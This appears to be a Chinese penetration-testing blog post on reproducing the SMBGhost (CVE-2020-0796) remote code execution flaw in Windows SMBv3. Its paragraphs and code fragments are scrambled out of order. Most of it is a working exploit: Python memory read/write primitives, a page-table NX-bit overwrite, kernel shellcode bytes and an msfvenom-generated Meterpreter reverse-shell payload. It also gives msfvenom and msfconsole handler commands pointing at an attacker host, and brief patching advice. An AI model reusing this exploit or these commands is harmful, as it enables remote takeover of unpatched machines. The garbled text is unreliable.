phys_addr_enc)self.phys_addr2 struct.pack(Q

  网络渗透测试     |      2026-07-04 17:38

pKernelUserSharedPTE)print([] KUSER_SHARED_DATA PTE NX bit cleared!)# TODO: figure out why we cant write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function.to_write len(KERNEL_SHELLCODE)write_bytes 0while write_bytes to_write:write_sz min([write_unit。

, port。

port, port)if self_ref is None:sys.exit([-] failed to find PML4 self reference entry!)PML4_SELFREF (self_ref 0xFFF) 3print([] found PML4 self-ref entry %0x % PML4_SELFREF)def find_low_stub(ip,, port)smb_negotiate(sock)sock.recv(1000)compressed_data compress_evil(data)dummy_data b\x33*(overflow_val offset)smb_compress(sock,         但试了N次了就是成功不了呀很烦每次攻击就只会蓝屏重启靶机把时间浪费在等靶机重启的过程问题是不论蓝屏多少次重启多少次就是反弹不到shell。

index)if buff is None:sys.exit([-] physical read primitive failed!)entry struct.unpack(Q, --port。

pte)if pte_buff is None:sys.exit([-] physical read primitive failed)phys_addr (struct.unpack(Q, pshellcodeva), port)smb_negotiate(sock)buff sock.recv(1000)sock.close()if buff[4:8] ! b\xfeSMB:return buffdef get_phys_addr(ip,# so we try to reduce number of reads like thisif not (index 0xFFF):phys_addr get_phys_addr(ip, buff[0:8])[0]# Clear NX bitoverwrite_val pte_val (((1 63) - 1))overwrite_buff struct.pack(Q, buff[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET 8])[0]print([] PML4 at %lx % PML4)PHAL_HEAP struct.unpack(Q, port, port。

0x0)self.process struct.pack(Q, compressed_data,buff[i 0x38:i0x40])[0]print([] found HalpApicRequestInterrupt at %lx % PHALP_APIC_INTERRUPT)returnindex entry_indicessys.exit([-] failed to find HalpInterruptController!)def search_selfref(ip, port, PHALP_INTERRUPT HALP_APIC_REQ_INTERRUPT_OFFSET)print([] overwrote HalpInterruptController pointer, port):search_len 0x1000index PML4while search_len:buff read_physmem_primitive(ip, pte_buff[0:8])[0] 0xFFFFF000) \(va_addr 0xFFF)return phys_addrdef get_pte_va(addr):pt addr 9lb (0xFFFF 48) | (PML4_SELFREF 39)ub ((0xFFFF 48) | (PML4_SELFREF 39) 0x8000000000 - 1) 0xFFFFFFFFFFFFFFF8pt pt | lbpt pt ubreturn ptdef overwrite_pte(ip, requiredTrue)parser.add_argument(-p, phys_addr)if buff is not None:return buffdef try_read_physmem_primitive(ip,。

port, to_write - write_bytes])write_primitive(ip, pdte)if pt_buff is None:sys.exit([-] physical read primitive failed)pt struct.unpack(Q, phys_addr_enc)self.phys_addr3 struct.pack(Q, data, addr):phys_addr get_phys_addr(ip, pt_buff[0:8])[0]if pt (1 (8 - 1)):phys_addr (pt 0xFFFFF000) (pt_index 0xFFF)*0x1000 (va_addr 0xFFF)return phys_addrelse:pt pt 0xFFFFF000pte pt pt_index*0x8pte_buff read_physmem_primitive(ip, Version 1903 (Server Core installation) Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for ARM64-based Systems Windows Server, port, port):global PML4_SELFREFself_ref search_selfref(ip, addr)buff read_physmem_primitive(ip。

phys_addr_enc)self.phys_addr2 struct.pack(Q, 0x5018)self.alloc_processor struct.pack(H, PHALP_INTERRUPT HALP_APIC_REQ_INTERRUPT_OFFSET)KERNEL_SHELLCODE struct.pack(Q, phys_addr).raw_bytes()write_primitive(ip, should have execution shortly...)if __name__ __main__:parser argparse.ArgumentParser()parser.add_argument(-ip, but could use improvementwhile i entry_indices:entry struct.unpack(Q, map_va, 0x48)self.mdl_flags struct.pack(H, port, buff[0:8])[0]if buff is None:sys.exit([-] physical read primitive failed!)else:PHALP_APIC_INTERRUPT struct.unpack(Q。

port, pdpte)if pdt_buff is None:sys.exit([-] physical read primitive failed)pdt struct.unpack(Q。

phys_addr):self.next struct.pack(Q, index)else:phys_addr (phys_addr 0xFFFFFFFFFFFFF000) (index 0xFFF)buff read_physmem_primitive(ip, buff[0:8])[0] 0xFFFFFFFFFFFF00FFif entry LOWSTUB_JMP:print([] found low stub at phys addr %lx! % index)PML4 struct.unpack(Q。

offset):sock reconnect(ip, map_va)map_va ~0xFFFself.start_va struct.pack(Q, phys_addr i 0x38)PHALP_APIC_INTERRUPT struct.unpack(Q, port, port, data)sock.close()def write_srvnet_buffer_hdr(ip, phys_addr)if buff is None:sys.exit([-] physical read primitive failed!)entry_indices 8*(((len(buff) 8 // 2) // 8) - 1)i 0# This heuristic seems to be OK to find HalpInterruptController, port, port。

影响版本 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, 0x258)self.byte_offset struct.pack(L。

0xFFFFFFFF, phys_addr):fake_mdl MDL(pmdl_mapva, port)smb_negotiate(sock)sock.recv(1000)uncompressed_data b\x41*(overflow_val - len(data))uncompressed_data b\x00*PNET_RAW_BUFF_OFFSETuncompressed_data struct.pack(Q,buff[i:i8])[0] 0xFFFFF000if entry PML4:return index ii 8search_len - entry_indicesindex entry_indicesdef find_pml4_selfref(ip。

port, port)build_shellcode()print([] built shellcode!)pKernelUserSharedPTE get_pte_va(KUSER_SHARED_DATA)print([] KUSER_SHARED_DATA PTE at %lx % pKernelUserSharedPTE)overwrite_pte(ip, (phys_addr 0xFFF) 0x4)phys_addr_enc (phys_addr 0xFFFFFFFFFFFFF000) 12self.phys_addr1 struct.pack(Q, port, data, smb_compress# Use lowstub jmp bytes to signature searchLOWSTUB_JMP 0x1000600E9# Offset of PML4 pointer in lowstubPML4_LOWSTUB_OFFSET 0xA0# Offset of lowstub virtual address in lowstubSELFVA_LOWSTUB_OFFSET 0x78# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptControllerHALP_APIC_REQ_INTERRUPT_OFFSET 0x78KUSER_SHARED_DATA 0xFFFFF78000000000# Offset of pNetRawBuffer in SRVNET_BUFFER_HDRPNET_RAW_BUFF_OFFSET 0x18# Offset of pMDL1 in SRVNET_BUFFER_HDRPMDL1_OFFSET 0x38# Shellcode from kernel_shellcode.asmKERNEL_SHELLCODE b\x41\x50\x41\x51\x41\x55\x41\x57\x41\x56\x51\x52\x53\x56\x57\x4CKERNEL_SHELLCODE b\x8D\x35\xB5\x02\x00\x00\x49\x8B\x86\xD8\x00\x00\x00\x49\x8B\x9EKERNEL_SHELLCODE b\xE0\x00\x00\x00\x48\x89\x18\xFB\x48\x31\xC9\x44\x0F\x22\xC1\xB9KERNEL_SHELLCODE b\x82\x00\x00\xC0\x0F\x32\x25\x00\xF0\xFF\xFF\x48\xC1\xE2\x20\x48KERNEL_SHELLCODE b\x01\xD0\x48\x2D\x00\x10\x00\x00\x66\x81\x38\x4D\x5A\x75\xF3\x49KERNEL_SHELLCODE b\x89\xC7\x4D\x89\x3E\xBF\x78\x7C\xF4\xDB\xE8\xE4\x00\x00\x00\x49KERNEL_SHELLCODE b\x89\xC5\xBF\x3F\x5F\x64\x77\xE8\x38\x01\x00\x00\x48\x89\xC1\xBFKERNEL_SHELLCODE b\xE1\x14\x01\x17\xE8\x2B\x01\x00\x00\x48\x89\xC2\x48\x83\xC2\x08KERNEL_SHELLCODE b\x49\x8D\x74\x0D\x00\xE8\x09\x01\x00\x00\x3D\xD8\x83\xE0\x3E\x74KERNEL_SHELLCODE b\x0A\x4D\x8B\x6C\x15\x00\x49\x29\xD5\xEB\xE5\xBF\x48\xB8\x18\xB8KERNEL_SHELLCODE b\x4C\x89\xE9\xE8\x9B\x00\x00\x00\x49\x89\x46\x08\x4D\x8B\x45\x30KERNEL_SHELLCODE b\x4D\x8B\x4D\x38\x49\x81\xE8\xF8\x02\x00\x00\x48\x31\xF6\x49\x81KERNEL_SHELLCODE b\xE9\xF8\x02\x00\x00\x41\x8B\x79\x74\x0F\xBA\xE7\x04\x73\x05\x4CKERNEL_SHELLCODE b\x89\xCE\xEB\x0C\x4D\x39\xC8\x4D\x8B\x89\x00\x03\x00\x00\x75\xDEKERNEL_SHELLCODE b\x48\x85\xF6\x74\x49\x49\x8D\x4E\x10\x48\x89\xF2\x4D\x31\xC0\x4CKERNEL_SHELLCODE b\x8D\x0D\xC2\x00\x00\x00\x52\x41\x50\x41\x50\x41\x50\xBF\xC4\x5CKERNEL_SHELLCODE b\x19\x6D\x48\x83\xEC\x20\xE8\x38\x00\x00\x00\x48\x83\xC4\x40\x49KERNEL_SHELLCODE b\x8D\x4E\x10\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20\xB8\x05\x00\x00KERNEL_SHELLCODE b\x00\x44\x0F\x22\xC0\xE8\x19\x00\x00\x00\x48\x83\xC4\x20\xFA\x48KERNEL_SHELLCODE b\x89\xD8\x5F\x5E\x5B\x5A\x59\x41\x5E\x41\x5F\x41\x5D\x41\x59\x41KERNEL_SHELLCODE b\x58\xFF\xE0\xE8\x02\x00\x00\x00\xFF\xE0\x53\x51\x56\x41\x8B\x47KERNEL_SHELLCODE b\x3C\x4C\x01\xF8\x8B\x80\x88\x00\x00\x00\x4C\x01\xF8\x50\x8B\x48KERNEL_SHELLCODE b\x18\x8B\x58\x20\x4C\x01\xFB\xFF\xC9\x8B\x34\x8B\x4C\x01\xFE\xE8KERNEL_SHELLCODE b\x1F\x00\x00\x00\x39\xF8\x75\xEF\x58\x8B\x58\x24\x4C\x01\xFB\x66KERNEL_SHELLCODE b\x8B\x0C\x4B\x8B\x58\x1C\x4C\x01\xFB\x8B\x04\x8B\x4C\x01\xF8\x5EKERNEL_SHELLCODE b\x59\x5B\xC3\x52\x31\xC0\x99\xAC\xC1\xCA\x0D\x01\xC2\x85\xC0\x75KERNEL_SHELLCODE b\xF6\x92\x5A\xC3\xE8\xA1\xFF\xFF\xFF\x80\x78\x02\x80\x77\x05\x0FKERNEL_SHELLCODE b\xB6\x40\x03\xC3\x8B\x40\x03\xC3\x41\x57\x41\x56\x57\x56\x48\x8BKERNEL_SHELLCODE b\x05\x0E\x01\x00\x00\x48\x8B\x48\x18\x48\x8B\x49\x20\x48\x8B\x09KERNEL_SHELLCODE b\x66\x83\x79\x48\x18\x75\xF6\x48\x8B\x41\x50\x81\x78\x0C\x33\x00KERNEL_SHELLCODE b\x32\x00\x75\xE9\x4C\x8B\x79\x20\xBF\x5E\x51\x5E\x83\xE8\x58\xFFKERNEL_SHELLCODE b\xFF\xFF\x49\x89\xC6\x4C\x8B\x3D\xCF\x00\x00\x00\x31\xC0\x48\x8DKERNEL_SHELLCODE b\x15\x96\x01\x00\x00\x89\xC1\x48\xF7\xD1\x49\x89\xC0\xB0\x40\x50KERNEL_SHELLCODE b\xC1\xE0\x06\x50\x49\x89\x01\x48\x83\xEC\x20\xBF\xEA\x99\x6E\x57KERNEL_SHELLCODE b\xE8\x1E\xFF\xFF\xFF\x48\x83\xC4\x30\x48\x8B\x3D\x6B\x01\x00\x00KERNEL_SHELLCODE b\x48\x8D\x35\x77\x00\x00\x00\xB9\x1D\x00\x00\x00\xF3\xA4\x48\x8DKERNEL_SHELLCODE b\x35\x6E\x01\x00\x00\xB9\x58\x02\x00\x00\xF3\xA4\x48\x8D\x0D\xE0KERNEL_SHELLCODE b\x00\x00\x00\x65\x48\x8B\x14\x25\x88\x01\x00\x00\x4D\x31\xC0\x4CKERNEL_SHELLCODE b\x8D\x0D\x46\x00\x00\x00\x41\x50\x6A\x01\x48\x8B\x05\x2A\x01\x00KERNEL_SHELLCODE b\x00\x50\x41\x50\x48\x83\xEC\x20\xBF\xC4\x5C\x19\x6D\xE8\xC1\xFEKERNEL_SHELLCODE b\xFF\xFF\x48\x83\xC4\x40\x48\x8D\x0D\xA6\x00\x00\x00\x4C\x89\xF2KERNEL_SHELLCODE b\x4D\x31\xC9\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20\xE8\xA2\xFE\xFFKERNEL_SHELLCODE b\xFF\x48\x83\xC4\x20\x5E\x5F\x41\x5E\x41\x5F\xC3\x90\xC3\x48\x92KERNEL_SHELLCODE b\x31\xC9\x51\x51\x49\x89\xC9\x4C\x8D\x05\x0D\x00\x00\x00\x89\xCAKERNEL_SHELLCODE b\x48\x83\xEC\x20\xFF\xD0\x48\x83\xC4\x30\xC3\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58KERNEL_SHELLCODE b\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x00\x00\x00\x00\x00KERNEL_SHELLCODE b\x00\x00\x00# Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit?USER_PAYLOAD bUSER_PAYLOAD b\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8dUSER_PAYLOAD b\x05\xef\xff\xff\xff\x48\xbb\xb4\x1d\xfa\x3b\x9dUSER_PAYLOAD b\xab\x9a\xb7\x48\x31\x58\x27\x48\x2d\xf8\xff\xffUSER_PAYLOAD b\xff\xe2\xf4\x48\x55\x79\xdf\x6d\x43\x56\xb7\xb4USER_PAYLOAD b\x1d\xbb\x6a\xdc\xfb\xc8\xe6\xe2\x55\xcb\xe9\xf8USER_PAYLOAD b\xe3\x11\xe5\xd4\x55\x71\x69\x85\xe3\x11\xe5\x94USER_PAYLOAD b\x50\xcb\xf2\xd5\xa4\x2d\xfd\xfe\x55\x71\x49\xcdUSER_PAYLOAD b\xe3\xab\x77\x18\x21\x9b\x47\x9f\x87\xba\xf6\x75USER_PAYLOAD b\xd4\xf7\x7a\x9c\x6a\x78\x5a\xe6\x5c\xab\x73\x16USER_PAYLOAD b\xf9\xba\x3c\xf6\x21\xb2\x3a\x4d\xcd\x1b\xcf\xacUSER_PAYLOAD b\x16\xf8\x34\x18\xd9\x9a\xb7\xb4\x96\x7a\xb3\x9dUSER_PAYLOAD b\xab\x9a\xff\x31\xdd\x8e\x5c\xd5\xaa\x4a\xf3\x3fUSER_PAYLOAD b\x5d\xda\xb0\xd5\xb3\xca\xfe\xb5\xcd\x19\x6d\xd5USER_PAYLOAD b\x54\x53\xfa\x85\xd4\xbb\xb0\xa9\x23\xd2\xb6\x62USER_PAYLOAD b\x55\xcb\xfb\xdc\x6a\x53\xba\x18\x5c\xfb\xfa\xa5USER_PAYLOAD b\x4b\xef\x46\xf8\x1e\xb6\x1f\x95\xee\xa3\x66\xc1USER_PAYLOAD b\xc5\xa2\x7f\x16\xeb\xbe\xfe\xb5\xcd\x9c\x7a\x16USER_PAYLOAD b\xa7\xd2\xf3\x3f\x5d\xe6\x72\x9c\x7b\xdb\x3c\xb0USER_PAYLOAD b\x95\xb2\x3a\x4d\xea\xc2\xf6\xec\x43\xa3\x61\xdcUSER_PAYLOAD b\xf3\xdb\xee\xf5\x47\xb2\xb8\x71\x8b\xdb\xe5\x4bUSER_PAYLOAD b\xfd\xa2\x7a\xc4\xf1\xd2\x3c\xa6\xf4\xb1\xc4\x62USER_PAYLOAD b\x54\xc7\xfe\x0a\x6a\x89\x09\xc2\x98\xa8\xb7\xb4USER_PAYLOAD b\x5c\xac\x72\x14\x4d\xd2\x36\x58\xbd\xfb\x3b\x9dUSER_PAYLOAD b\xe2\x13\x52\xfd\xa1\xf8\x3b\x88\x18\x5a\x1f\xb4USER_PAYLOAD b\x98\xbb\x6f\xd4\x22\x7e\xfb\x3d\xec\xbb\x81\xd1USER_PAYLOAD b\xdc\xbc\xb0\x4b\xc8\xb6\xb2\x77\xc3\x9b\xb6\xb4USER_PAYLOAD b\x1d\xa3\x7a\x27\x82\x1a\xdc\xb4\xe2\x2f\x51\x97USER_PAYLOAD b\xea\xc4\xe7\xe4\x50\xcb\xf2\xd0\x9a\x5a\xff\x4bUSER_PAYLOAD b\xdd\xb2\xb2\x5f\xe3\x65\x77\xfc\x94\x3b\x7a\x27USER_PAYLOAD b\x41\x95\x68\x54\xe2\x2f\x73\x14\x6c\xf0\xa7\xf5USER_PAYLOAD b\x45\xb6\xb2\x7f\xe3\x13\x4e\xf5\xa7\x63\x9e\xe9USER_PAYLOAD b\xca\x65\x62\x31\xdd\x8e\x31\xd4\x54\x54\xc2\x51USER_PAYLOAD b\xf5\x69\x3b\x9d\xab\xd2\x34\x58\x0d\xb2\xb2\x7fUSER_PAYLOAD b\xe6\xab\x7e\xde\x19\xbb\x63\xd5\x22\x63\xf6\x0eUSER_PAYLOAD b\x1f\x23\xf3\xc2\x54\x4f\x34\x4c\x1d\x84\x6e\xd5USER_PAYLOAD b\x28\x5e\x97\xea\x94\x0c\x51\xdd\xea\xc3\xdf\xb4USER_PAYLOAD b\x0d\xfa\x3b\xdc\xf3\xd2\x3e\x46\x55\xcb\xf2\xdcUSER_PAYLOAD b\x11\xc2\x13\xe7\xf8\x05\xee\xd5\x22\x59\xfe\x3dUSER_PAYLOAD b\xda\xb7\x0a\x54\xe2\x13\x47\xfc\x94\x20\x73\x14USER_PAYLOAD b\x52\xdb\x0d\xb6\xc4\x32\x64\x62\x7e\x19\x4f\xb4USER_PAYLOAD b\x60\xd2\x63\xdc\xfc\xc3\xdf\xb4\x5d\xfa\x3b\xdcUSER_PAYLOAD b\xf3\xf0\xb7\xee\x5c\x40\x30\xb2\xa4\xaa\x48\x61USER_PAYLOAD b\x4a\xa3\x7a\x27\xde\xf4\xfa\xd5\xe2\x2f\x72\x62USER_PAYLOAD b\x65\x73\x8b\x4b\xe2\x05\x73\x9c\x68\xd2\x9e\x72USER_PAYLOAD b\x55\x7f\xcd\xe8\x1f\xdb\x48\x53\x45\x90\x3b\xc4USER_PAYLOAD b\xe2\x5d\x75\x44\xa8\x58\x6d\x62\x7e\x9a\xb7PML4_SELFREF 0PHAL_HEAP 0PHALP_INTERRUPT 0PHALP_APIC_INTERRUPT 0PNT_ENTRY 0max_read_retry 3overflow_val 0x1100write_unit 0xd0pmdl_va KUSER_SHARED_DATA 0x900pmdl_mapva KUSER_SHARED_DATA 0x800pshellcodeva KUSER_SHARED_DATA 0x950class MDL:def __init__(self, port)find_pml4_selfref(ip,。

port):global PML4global PHAL_HEAPlimit 0x100000index 0x1000while index limit:buff read_physmem_primitive(ip, buff[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET 8])[0] 0xFFFFFFFFF0000000print([] base of HAL heap at %lx % PHAL_HEAP)returnindex 0x1000sys.exit([-] Failed to find low stub in physical memory!)def do_rce(ip, port, args.port) 保存并退出 重新打开一个窗口配置msf并进行监听 msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp show options set lhost 192.168.0.133 set lport 5555 run   运行刚修改好的 exploit.py 文件 python3 exploit.py -ip 靶机IP地址   运行时可能会出现以上三种情况解决办法如下 检查win10防火墙是否关闭 检查win10的病毒和威胁防护中的各种保护是否关闭 重启win10 或者恢复快照这里建议恢复快照因为关机很有可能就会打上补丁恢复快照后再检查一下上面两项  然后再运行exploit.py文件发现可以成功运行msf监听的端口也成功反弹shell了 修复建议 更新系统完成补丁的安装 禁用SMB3.0的压缩功能 关闭SMB通信的445端口 通过ip安全策略屏蔽危险端口关闭危险服务 。

compress_evilfrom smb_win import smb_negotiate, helpIP address of target, port)search_hal_heap(ip, phys_addr)if buff is None:sys.exit([-] read primitive failed!)pte_val struct.unpack(Q, port, PHALP_APIC_INTERRUPT)KERNEL_SHELLCODE USER_PAYLOADdef search_hal_heap(ip, port))return sockdef write_primitive(ip, addr)def build_shellcode():global KERNEL_SHELLCODEKERNEL_SHELLCODE struct.pack(Q, port, index)if buff is None:returnentry_indices 8*(((len(buff) 8 // 2) // 8) - 1)i 0while i entry_indices:entry struct.unpack(Q, 0x0)self.reserved struct.pack(H, port):global PHALP_INTERRUPTglobal PHALP_APIC_INTERRUPTsearch_len 0x10000index PHAL_HEAPpage_index PHAL_HEAPcons 0phys_addr 0while index PHAL_HEAP search_len:# It seems that pages in the HAL heap are not necessarily contiguous in physical memory, port。

typeint)args parser.parse_args()do_rce(args.ip。

requiredFalse, KERNEL_SHELLCODE[write_bytes:write_bytes write_sz]。

0x0)self.map_va struct.pack(Q, dummy_data)sock.close()def read_physmem_primitive(ip, \default: 445。

struct.pack(Q, compressed_data, default445,, helpSMB port, pmdl_va)write_srvnet_buffer_hdr(ip, port):find_low_stub(ip。

fake_mdl,, pmdl_va), struct.pack(Q, pdpt_buff[0:8])[0] 0xFFFFF000pdpte pdpt pdpt_index*0x8pdt_buff read_physmem_primitive(ip。

pshellcodeva write_bytes)write_bytes write_szprint([] Wrote shellcode at %lx! % pshellcodeva)input([] Press a key to execute shellcode!)write_primitive(ip, 0xFFFFEFFF, pml4e)if pdpt_buff is None:sys.exit([-] physical read primitive failed)pdpt struct.unpack(Q, map_va)self.byte_count struct.pack(L, va_addr):pml4_index (((1 9) - 1) (va_addr (40 - 1)))pdpt_index (((1 9) - 1) (va_addr (31 - 1)))pdt_index (((1 9) - 1) (va_addr (22 - 1)))pt_index (((1 9) - 1) (va_addr (13 - 1)))pml4e PML4 pml4_index*0x8pdpt_buff read_physmem_primitive(ip。

addr)compressed_data compress(uncompressed_data)smb_compress(sock。

Version 1909 (Server Core installation) 漏洞复现 环境准备 靶机 ip地址 windows 10 192.168.0.153 kali 192.168.0.133 查看win10版本 关闭防火墙 使用kali和win10互相ping确保二者可以通信 验证漏洞 工具下载地址https://github.com/eerykitty/CVE-2020-0796-PoC 将工具下载后拖至kali中进行解压进行蓝屏测试 unzip CVE-2020-0796-PoC-master.zip cd CVE-2020-0796-PoC-master  ./CVE-2020-0796.py 靶机IP地址 如果出现下面情况使用以下命令进行安装 pip install ntlm_auth  继续执行 发现win10出现蓝屏 证明漏洞存在 漏洞攻击 工具下载地址https://github.com/chompie1337/SMBGhost_RCE_PoC 将工具下载后拖至kali中进行解压  进入目录 使用msf生成exp反弹shell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOSTkali的IP地址 LPORT5555 -b \x00 -i 1 -f python exploit -p    //payload -b   //编码格式 -i    //编码次数 -f    //生成的文件类型 将生成的exploit文件中的 buf 替换为 USER_PAYLOAD vi exploit :%s/buf/USER_PAYLOAD :wq 将工具中 exploit.py中的USER_PAYLOAD部分替换成exploit文件中的内容 也可将我替换好的直接和你的exploit.py文件替换 #!/usr/bin/env pythonimport sysimport socketimport structimport argparsefrom lznt1 import compress,, port, port。

port, buff[i:i8])[0]i 8if (entry 0xFFFFFF0000000000) ! 0xFFFFF80000000000:cons 0continuecons 1if cons 3:PHALP_INTERRUPT index i - 0x40print([] found HalpInterruptController at %lx% PHALP_INTERRUPT)if len(buff) i 0x40:buff read_physmem_primitive(ip,         于是笔者通过种种的试错集众家经验之所长写下了这篇文章希望对你能够有帮助 信我保你复现成功 漏洞描述 2020年3月微软公布SMB远程代码执行漏洞CVE-2020-0796又称“永恒之黑”该漏洞由SMB 3.1.1协议中处理压缩消息时对其中数据没有经过安全检查没有检查长度是否合法最终导致整数溢出直接使用会引发内存破坏漏洞可能被攻击者利用远程执行任意代码攻击者利用该漏洞无须权限即可实现远程代码执行受黑客攻击的目标系统只需开机在线即可能被入侵, phys_addr):i 0while i max_read_retry:i 1buff try_read_physmem_primitive(ip, PMDL1_OFFSET)i 0while i max_read_retry:i 1sock reconnect(ip, 0x0)self.size struct.pack(H, port, port):sock socket.socket(socket.AF_INET)sock.settimeout(7)sock.connect((ip, port, phys_addr_enc)def raw_bytes(self):mdl_bytes self.next self.size self.mdl_flags \self.alloc_processor self.reserved self.process \self.map_va self.start_va self.byte_count \self.byte_offset self.phys_addr1 self.phys_addr2 \self.phys_addr3return mdl_bytesdef reconnect(ip, overwrite_buff, overwrite_val)write_primitive(ip, pdt_buff[0:8])[0] 0xFFFFF000pdte pdt pdt_index*0x8pt_buff read_physmem_primitive(ip, addr):sock reconnect(ip,         相信很多朋友们都遇到了一个让人心态崩溃的场景就是在复现永恒之黑的时候明明已经知道靶机存在该漏洞而且能够蓝屏但就是死活反弹不到shell于是在网上左搜右搜发现基本上每个博主的复现方法都一致但有的最后成功了有的没有成功反弹shell的告诉你多试几次。